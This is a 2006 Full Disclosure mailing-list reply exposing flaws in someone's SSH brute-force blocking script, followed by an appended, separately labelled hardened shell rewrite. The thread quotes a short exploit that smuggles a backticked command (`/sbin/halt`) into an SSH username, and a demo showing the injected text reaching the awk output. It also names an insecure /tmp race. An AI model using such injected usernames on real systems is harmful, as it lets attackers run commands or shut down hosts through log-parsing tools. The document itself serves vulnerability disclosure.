Full Disclosure mailing list archives

Re: SSH brute force blocking tool


From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 21:02:31 +0000

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
> Tavis Ormandy wrote:
> 
> > Nice work, really subtle rootkit. I like the email phone-home.
> > 
> > Here's an exploit.
> > 
> > #!/bin/sh
> > ssh 'foo bar `/sbin/halt`'@victim
> 
> Since you seem to be clueless I'll answer step by step. Here goes idiot. 
> (Sinful to see someone so clueless coming from Gentoo... Guess it goes 
> with the romper room Linux territory)
> /////
> awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny

insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.

-- 
-------------------------------------
taviso () sdf lonestar org | finger me for my pgp key.
-------------------------------------------------------
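Added here as a defender's example, not code from the thread and not J. Oquendo's tool: a hardened rewrite of the log-scraping step that addresses both problems Tavis raises (untrusted username text reaching hosts.deny, and the predictable /tmp scratch file). The sample log lines, the `Invalid/Illegal user ... from <ip>` layout they follow, and the function names are constructed assumptions.

```shell
#!/bin/sh
# Hardened rewrite of the log-scraping step (added example, not the thread's
# tool). Two fixes: (1) the source address is taken from the last "from" token
# and must be a well-formed IPv4 address, so a client-chosen username such as
# `0wn3d` can never reach hosts.deny; (2) the scratch file comes from mktemp
# beside the destination, not from a fixed, predictable path under /tmp.

# Constructed sample sshd log lines; the layout is an assumption, not a copy
# of a real /var/log/secure.
SAMPLE_LOG='Nov 27 20:59:01 host sshd[1234]: Invalid user foo from 192.0.2.10
Nov 27 20:59:02 host sshd[1234]: Illegal user bar from 198.51.100.7 port 4000 ssh2
Nov 27 21:00:01 host sshd[1235]: Invalid user `0wn3d` from 198.51.100.7
Nov 27 21:00:02 host sshd[1236]: Invalid user x from 10.0.0.1 from 203.0.113.5
Nov 27 21:00:03 host sshd[1237]: Invalid user y from 999.1.1.1'

extract_attacker_ips() {
    # stdin: log lines; stdout: one validated, de-duplicated IPv4 per line
    awk '
    function valid_ipv4(s,    n, p, i) {
        n = split(s, p, ".")
        if (n != 4) return 0
        for (i = 1; i <= 4; i++)
            if (p[i] !~ /^[0-9]+$/ || p[i] + 0 > 255) return 0
        return 1
    }
    /[Ii](nvalid|llegal) user/ {
        ip = ""
        # sshd appends "from <ip>" after the username, so the last "from" wins
        for (i = 1; i < NF; i++)
            if ($i == "from" && valid_ipv4($(i + 1))) ip = $(i + 1)
        if (ip != "") print ip
    }' | sort -u
}

append_deny_entries() {
    # $1: destination (e.g. /etc/hosts.deny); stdin: validated IPs.
    # Writes to a mktemp file in the same directory, then renames into place.
    dest=$1
    tmp=$(mktemp "$dest.XXXXXX") || return 1
    { cat "$dest" 2>/dev/null; sed 's/^/sshd: /'; } > "$tmp" && mv "$tmp" "$dest"
}

# Demo on the constructed lines: prints 192.0.2.10, 198.51.100.7, 203.0.113.5
printf '%s\n' "$SAMPLE_LOG" | extract_attacker_ips
```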
